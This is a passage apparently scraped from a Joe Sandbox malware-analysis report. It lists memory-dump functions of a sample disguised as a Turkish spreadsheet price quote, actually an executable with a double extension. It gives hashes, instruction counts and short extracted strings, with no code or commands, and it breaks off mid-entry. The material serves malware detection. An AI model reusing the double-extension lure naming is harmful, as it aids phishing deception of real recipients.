Instruction ID: b2651e08d24cee13258c05a3c20ef631f4186ff4acc95cc17132d3f24028851a
Opcode Fuzzy Hash: e28717a39e9795a1632c3e9d48e7d264ffe8db12761efd38758e52d8efe5e4ca
Instruction Fuzzy Hash: 052107B9504300EFDB25DF14D9C0B26BB65FB84315F24C5ADED0A4B252C736DC8ACA65

Function 00C5D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713116396.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c5d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b5de1c253e1b3a0b7059a6c860af31fcacc3da13e0b18a5ecf76b32810a027
Instruction ID: a165af928fe0552a4d73c371dbda7896ed9cf89afd94b5f8ca4f60cfd738b721
Opcode Fuzzy Hash: f5b5de1c253e1b3a0b7059a6c860af31fcacc3da13e0b18a5ecf76b32810a027
Instruction Fuzzy Hash: 4021D379504300DFDB24DF14D5C0B26BB65EBC4315F24C569ED0A4B296C33AD88BCA65

Function 00C5D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713116396.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c5d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bebfe84f1ce1679c974bf16085c561a03a5bb792be1249f66ff0ba3523792a01
Instruction ID: 0810e096f15bf9d1e78912963aeb042763f828ad728a0b10e8a7741d4a081e33
Opcode Fuzzy Hash: bebfe84f1ce1679c974bf16085c561a03a5bb792be1249f66ff0ba3523792a01
Instruction Fuzzy Hash: BC2180755093808FDB12CF24D990715BF71EB86314F28C5EAD8498B6A7C33A984ACB62

Function 00C4D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712955338.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c4d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 305c2f628c048ca8cf0feccb06f04c7abe546ab8975067085bb9b8fe45cc1f5c
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 15112676404240CFCB12DF10D5C0B16BF72FB94324F24C2A9DC0A0B656C33AE95ACBA1

Function 00C4D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712955338.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c4d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction ID: 4a2da31e552bc81f0275b059f4369c89c453da3a5eb5b796434b3272b0b49ffd
Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
Instruction Fuzzy Hash: 841126B2504280CFCB12DF10D5C0B16BF72FB94318F24C6A9DC0A4B656C33AD95ACBA1

Function 00C5D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713116396.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c5d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 64f696b56409b67a55d24844e1ece1cba61516af7475684e3bf6691d87e3e229
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 2A118E79504340DFDB15CF14D9C4B15BB61FB84314F24C6ADDC4A4B656C33AD98ACB51

Function 00C4D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712955338.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c4d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86150c8acca93b5c189c54875497a5c0a48b8e9b5eca82ad6ef299ae92432c55
Instruction ID: 1acfc5b1bc6a2a096398102b35c3ce9fcd31d47944cfaa2cbad6d44503668bad
Opcode Fuzzy Hash: 86150c8acca93b5c189c54875497a5c0a48b8e9b5eca82ad6ef299ae92432c55
Instruction Fuzzy Hash: AD012B710043409AE7106B26DCC0B66FFE8FF51374F18C45AED1A4A28AC7389C40DA71

Function 00C4D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1712955338.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c4d000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d9071355a2eff0150decdafa14b23e0bd1278691d38dd1d0eee1b2c668d0250
Instruction ID: ee250c187f84e47c70a21fad3cb99a33e05f5f4363f85f9e6c8adf67db0f9244
Opcode Fuzzy Hash: 4d9071355a2eff0150decdafa14b23e0bd1278691d38dd1d0eee1b2c668d0250
Instruction Fuzzy Hash: 1FF062724043449EE7209A16DDC4B62FFA8EF51739F18C45AED194A286C379AD44CAB1

Non-executed Functions

Function 07232D32 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d7268168b90bfbac418012d25c331105cc572e1c4f08e9eab46c881624837f5
Instruction ID: 0c07cfc27bb830070e91d4f6e7283514a2c61296e7395ff2cda9c563b69cbbd4
Opcode Fuzzy Hash: 0d7268168b90bfbac418012d25c331105cc572e1c4f08e9eab46c881624837f5
Instruction Fuzzy Hash: FCE1FBB4E142598FCB14DFA9C5809AEFBF6FF89304F248169E415AB356D730A942CF60

Function 07233168 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ab04218d1602717ff5695f7c415f17d60ba93d4ac35c1fe0940f9cba9194a2c
Instruction ID: 67c76a371c179d2cecfe0f6f972e38349bfed560649201735136629e0483d0d7
Opcode Fuzzy Hash: 5ab04218d1602717ff5695f7c415f17d60ba93d4ac35c1fe0940f9cba9194a2c
Instruction Fuzzy Hash: 92E1EDB4E142198FDB14DFA9C5809AEFBF6FF49304F248159E415AB356D730AA42CF60

Function 07235530 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ffece50044bbd15d8a7cab277add4f3fc8ea66edc56b9e9ee1e9c8cef261f2
Instruction ID: d32a3950f4e995fdb94b364739897fd8008c7a1caab162b019ce6ca5c92ca0cb
Opcode Fuzzy Hash: 74ffece50044bbd15d8a7cab277add4f3fc8ea66edc56b9e9ee1e9c8cef261f2
Instruction Fuzzy Hash: B4E1FBB4E142198FCB14DFA9C5809AEFBF6FF49304F248169E819AB355D730A942CF60

Function 072335B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d10b17a5d2b0d79f3e1ba63dc9c3a8d6ff1ed709d7f658a62ce1ef8f0468bbc1
Instruction ID: 88feb8df66a8591f659becaa3562f257806c9a19444448973c89616c6f42d3b7
Opcode Fuzzy Hash: d10b17a5d2b0d79f3e1ba63dc9c3a8d6ff1ed709d7f658a62ce1ef8f0468bbc1
Instruction Fuzzy Hash: AAE1FDB4E142198FCB14DF99C5809AEFBF6FF49305F248169E815AB356D730AA42CF60

Function 072350F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 131c37836669ec1d52c425b9b381da59d58185fc36dd1f3079e3e6f895f4fa46
Instruction ID: ef388e4bd5c497bbdb159ac3a5407766689128c22217f2d8eb7d2f8c027e187e
Opcode Fuzzy Hash: 131c37836669ec1d52c425b9b381da59d58185fc36dd1f3079e3e6f895f4fa46
Instruction Fuzzy Hash: 32E10EB4E146198FCB14DFA9C5809AEFBF6FF49304F248169E819AB355D730A942CF60

Function 07239341 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6303407ed44edbd0937b4da0343d56ac67c52103ed63b91e35aa6b101deb5c3
Instruction ID: 6bfaedd2f5443cf527f8369d6b66292021a1f4aef4b425dd6ce595fa8c912640
Opcode Fuzzy Hash: a6303407ed44edbd0937b4da0343d56ac67c52103ed63b91e35aa6b101deb5c3
Instruction Fuzzy Hash: 00B1A7F07112068FEB26DB76C490BAE77FAAF8A704F10446DD186DB290CBB5E841CB51

Function 0103D55C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1715011548.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1030000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cddad9126f39074fa7d738113714969b1716594f1b4fdaa2ffbbaadb6ebf3ac0
Instruction ID: 35f601e0dcbac9ed628ca540277156af7e5a2d8e8b284c9721fa93a49b24218f
Opcode Fuzzy Hash: cddad9126f39074fa7d738113714969b1716594f1b4fdaa2ffbbaadb6ebf3ac0
Instruction Fuzzy Hash: 87A17E32E002068FCF0ADFB5D9409DEBBB6FFC5300B1585AAE905AB261DB71D955CB41

Function 072350E8 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e681f2efa1d60e9856648f35032874a4f4d3bb7b9cb717b415dea4a5a5842f5d
Instruction ID: 63bc2eac2a57dfbea4742beadf88fd3b9bb85978ae7cf5df6af99bb089a543e9
Opcode Fuzzy Hash: e681f2efa1d60e9856648f35032874a4f4d3bb7b9cb717b415dea4a5a5842f5d
Instruction Fuzzy Hash: 6B5132B5E142198FCB14DFA9D5409AEFBF6BF89304F24C169D418A7315D7309A41CFA1

Function 072335A2 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1719515803.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7230000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b4d346dff32520238dbb14bfd833c4834fe17af734b8e1ce9be46ff900ee2d
Instruction ID: dea51da8c48ad473018b3435b82f1cbaaa6319f3a714382f07c446fd43d07027
Opcode Fuzzy Hash: d6b4d346dff32520238dbb14bfd833c4834fe17af734b8e1ce9be46ff900ee2d
Instruction Fuzzy Hash: 35512EB4E142198FCB14CFA9C5405AEFBF6BF89300F24C1AAD418AB316D7309A42CF61

Analysis Process: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exePID: 6308, Parent PID: 280COMMON

Executed Functions

Function 0118B328 Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

PHdq, xrefs: 0118B758
Ljkp, xrefs: 0118B6CF
Ljkp, xrefs: 0118B6E5
0okp, xrefs: 0118B562
PHdq, xrefs: 0118B747

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: dc527fd58ad6f35b8d5f239b80fe4de8d299cd11eaa3a1bb0100703c779cbf5b
Instruction ID: 836d88347605b30e723d0c479db7ba2bfda963a3dd4d8c8690347cf2e948dc88
Opcode Fuzzy Hash: dc527fd58ad6f35b8d5f239b80fe4de8d299cd11eaa3a1bb0100703c779cbf5b
Instruction Fuzzy Hash: 10E10675E04618CFDB18DFA9C994A9DBBB2BF49310F15C069E819AB361DB30AC81CF54

Function 0118BBD2 Relevance: 6.4, Strings: 5, Instructions: 192COMMON

Download Yara Rule

Strings

0okp, xrefs: 0118BC42
PHdq, xrefs: 0118BE38
PHdq, xrefs: 0118BE27
Ljkp, xrefs: 0118BDC5
Ljkp, xrefs: 0118BDAF

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: 860f1c8406e1bd57f7ac7c71eacb79b3ad607476adf81ce32b6395200ad03524
Instruction ID: cde8562520ce993a5e6ab9300b237eb5e31c203b92da1241a91414cda3c43a1d
Opcode Fuzzy Hash: 860f1c8406e1bd57f7ac7c71eacb79b3ad607476adf81ce32b6395200ad03524
Instruction Fuzzy Hash: 8881E670E04218DFDB18DFAAD884A9DBBF2BF89304F14D169E809AB365DB309941CF15

Function 01184AD9 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

PHdq, xrefs: 01184D30
Ljkp, xrefs: 01184CCE
0okp, xrefs: 01184B4A
PHdq, xrefs: 01184D41
Ljkp, xrefs: 01184CB8

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: 3ca8d8fb5012d9e5403f09c23356ab05b6363a4581c952a6b3c8636bdd76e636
Instruction ID: 5c83aa907f79c2648e656e757ef805f4c632e5c8e4c16f8cec3a5bec18f17a3c
Opcode Fuzzy Hash: 3ca8d8fb5012d9e5403f09c23356ab05b6363a4581c952a6b3c8636bdd76e636
Instruction Fuzzy Hash: C481A374E00219CFDB58DFAAD984B9DBBF2BF88300F15D069E819AB265DB349941CF50

Function 0118C190 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

PHdq, xrefs: 0118C3F8
PHdq, xrefs: 0118C3E7
0okp, xrefs: 0118C202
Ljkp, xrefs: 0118C385
Ljkp, xrefs: 0118C36F

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: 9a9227a4c6a65d8e641760c35e5ef10a8a6c2d93c152e0870048506b085197c7
Instruction ID: 88fa165d3190c4e98fe75fdcd3d698c4c4b2f14860380bb476ec2bb32992a9a9
Opcode Fuzzy Hash: 9a9227a4c6a65d8e641760c35e5ef10a8a6c2d93c152e0870048506b085197c7
Instruction Fuzzy Hash: 23819574E00218CFDB58DFAAD884A9DBBF2BF89300F14D069E819AB265DB349945CF50

Function 0118BEB0 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

PHdq, xrefs: 0118C118
0okp, xrefs: 0118BF22
Ljkp, xrefs: 0118C0A5
Ljkp, xrefs: 0118C08F
PHdq, xrefs: 0118C107

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: a79f00408c6c3789421c5d5fdc5ed08926af92d4370a927b8fa065f1a1594f02
Instruction ID: 5c1666eaa3189f60431b08773389e1d9eed3ce7965af1ef7106d186566f3a4ac
Opcode Fuzzy Hash: a79f00408c6c3789421c5d5fdc5ed08926af92d4370a927b8fa065f1a1594f02
Instruction Fuzzy Hash: 7D81C674E00218CFDB18DFA9D984A9DBBF2BF89300F14D069E409AB365DB359985CF51

Function 0118C470 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

PHdq, xrefs: 0118C6D8
Ljkp, xrefs: 0118C64F
PHdq, xrefs: 0118C6C7
Ljkp, xrefs: 0118C665
0okp, xrefs: 0118C4E2

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: e589c999894553a63892df0ad7fc7ba4b5f3f51583c0dc8635ccfa688dcd4c98
Instruction ID: 0d5165d6151b27dea427d0748010a1675a371f53bad86dc70bbaefdace547493
Opcode Fuzzy Hash: e589c999894553a63892df0ad7fc7ba4b5f3f51583c0dc8635ccfa688dcd4c98
Instruction Fuzzy Hash: B68192B4E00218CFDB18DFA9D984A9DBBF2BF89304F24D069E409AB365DB309941CF50

Function 0118C752 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

Ljkp, xrefs: 0118C945
0okp, xrefs: 0118C7C2
PHdq, xrefs: 0118C9B8
PHdq, xrefs: 0118C9A7
Ljkp, xrefs: 0118C92F

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: d0631b67e7a493e7eb592c100ed9c60e4a697edce91d9f843cde405fca90c670
Instruction ID: 0122834ebd4b20f0b89cae116c2d3d3a246fda62d9016a38bc0480cd5e8b07f2
Opcode Fuzzy Hash: d0631b67e7a493e7eb592c100ed9c60e4a697edce91d9f843cde405fca90c670
Instruction Fuzzy Hash: 6081A274E00218CFDB58DFAAD984A9DBBF2BF89310F14D069E809AB365DB319941CF50

Function 0118CA32 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PHdq, xrefs: 0118CC87
0okp, xrefs: 0118CAA2
Ljkp, xrefs: 0118CC25
PHdq, xrefs: 0118CC98
Ljkp, xrefs: 0118CC0F

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
API String ID: 0-2148883620
Opcode ID: 81e79d7f686783a4e40e6e22cbb64726eaba20a5dbccd79d8f4e68af86f253da
Instruction ID: 9faece78ca7b8cc152a71737f6812eadf597d00763727da9fa5d3ba01345bab9
Opcode Fuzzy Hash: 81e79d7f686783a4e40e6e22cbb64726eaba20a5dbccd79d8f4e68af86f253da
Instruction Fuzzy Hash: EF81A274E00618CFDB18DFAAD994A9DBBF2BF88300F14D069E809AB365DB309941DF50

Function 01186730 Relevance: 5.4, Strings: 4, Instructions: 441COMMON

Download Yara Rule

Strings

(odq, xrefs: 01186988
,hq, xrefs: 011869F2
(odq, xrefs: 0118697A
,hq, xrefs: 01186A00

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: (odq$(odq$,hq$,hq
API String ID: 0-1125629291
Opcode ID: 30dd48a3f28b06db741df4031d70cefe9b256df264a5a2ec3be6e76579aef582
Instruction ID: 0e1b4f18d2f71f4cb4602ec8ebec36e167a72698a98383624715678e2a36e2cf
Opcode Fuzzy Hash: 30dd48a3f28b06db741df4031d70cefe9b256df264a5a2ec3be6e76579aef582
Instruction Fuzzy Hash: 48026E70A00209DFCB19EF69C984AAEBBB2FF89304F15C069E515AB2A5D734ED41CF51

Function 0118B4F2 Relevance: 3.9, Strings: 3, Instructions: 152COMMON

Download Yara Rule

Strings

PHdq, xrefs: 0118B758
0okp, xrefs: 0118B562
PHdq, xrefs: 0118B747

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 0okp$PHdq$PHdq
API String ID: 0-574722284
Opcode ID: 7fc5366d01a0ac6004087d84f7d0c30194bac364d7889890ea31d3e15f90cd7d
Instruction ID: 72566c546baaa730b59f76c5df7c53e5a07fedf66726a8ea2129dee2247b12ae
Opcode Fuzzy Hash: 7fc5366d01a0ac6004087d84f7d0c30194bac364d7889890ea31d3e15f90cd7d
Instruction Fuzzy Hash: A661C574E04608DFDB18DFAAD984A9EBBF2BF89300F14D029E815AB365DB349941CF54

Function 01189858 Relevance: 3.4, Strings: 2, Instructions: 859COMMON

Download Yara Rule

Strings

(odq, xrefs: 01189C78
4'dq, xrefs: 0118A273

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: (odq$4'dq
API String ID: 0-972384718
Opcode ID: dc8061da85a43ff853363feef5fcd3bb6a1690665965dcdaecb575220d895297
Instruction ID: 89e7192454e768c43c4d2a4a04b2a5468b6b92c15a1033c6567b10fcc596d627
Opcode Fuzzy Hash: dc8061da85a43ff853363feef5fcd3bb6a1690665965dcdaecb575220d895297
Instruction Fuzzy Hash: 78728470A00209DFCB19EF68D984AAEBBF2FF88314F15C55AE9159B2A1D730E941CF51

Function 01186108 Relevance: 3.0, Strings: 2, Instructions: 513COMMON

Download Yara Rule

Strings

Hhq, xrefs: 0118650E
(odq, xrefs: 01186642

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: (odq$Hhq
API String ID: 0-1720555311
Opcode ID: fbf2e6ce5a4580e86a0c6302e4c7a0e334c08b16c5967f6d90a8d9cc57acbf2f
Instruction ID: 482e6e602d1a0279c8adb3bdd9049bf9b0a8b64674fd0d15f6b0bbdc46a324dd
Opcode Fuzzy Hash: fbf2e6ce5a4580e86a0c6302e4c7a0e334c08b16c5967f6d90a8d9cc57acbf2f
Instruction Fuzzy Hash: 2E128170A002198FDB18EFA9C994AAEBBF6BF88304F10C569E515DB395DB349D41CF90

Function 05767EEB Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PHdq, xrefs: 057681A2
PHdq, xrefs: 057681B3

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: PHdq$PHdq
API String ID: 0-1995607813
Opcode ID: 2a564ce1226331f53c34d716612abbd9aadc60f2671d911c4e61216abf3da6fd
Instruction ID: 68e036a07ca741f3027307ab898e497fda1265a30e37abcf9be931cd54ebd66f
Opcode Fuzzy Hash: 2a564ce1226331f53c34d716612abbd9aadc60f2671d911c4e61216abf3da6fd
Instruction Fuzzy Hash: 4581B274E01218CFDB58DFAAC994BADBBF2BF89300F108169D819AB394DB355945DF40

Function 0118F01F Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ec8a7d60613b297fb535c295f9c4d6bffeff827e4266fb8dbf49d37849074f
Instruction ID: 5793b41c4843b0949271eaabb142bb12d72ab0a46d62c565c0757e8e6cd60f08
Opcode Fuzzy Hash: 45ec8a7d60613b297fb535c295f9c4d6bffeff827e4266fb8dbf49d37849074f
Instruction Fuzzy Hash: 6572C174E052298FDB68EF69C990BDDBBB2BB49300F1491E9D409A7255DB309EC2CF50

Function 05767910 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 820a41a53d7be199321373b8419a2406d8693efa2892407819fec8ffd025d1b0
Instruction ID: dd311ff327fe2889ecc25504c686d582cfbae74a20a48d9692acf2a80e7b98cc
Opcode Fuzzy Hash: 820a41a53d7be199321373b8419a2406d8693efa2892407819fec8ffd025d1b0
Instruction Fuzzy Hash: 21E1C2B4E01218CFDB28DFA5C984B9DBBB2BF89304F2081A9D409A7394DB355E85CF50

Function 0576C448 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

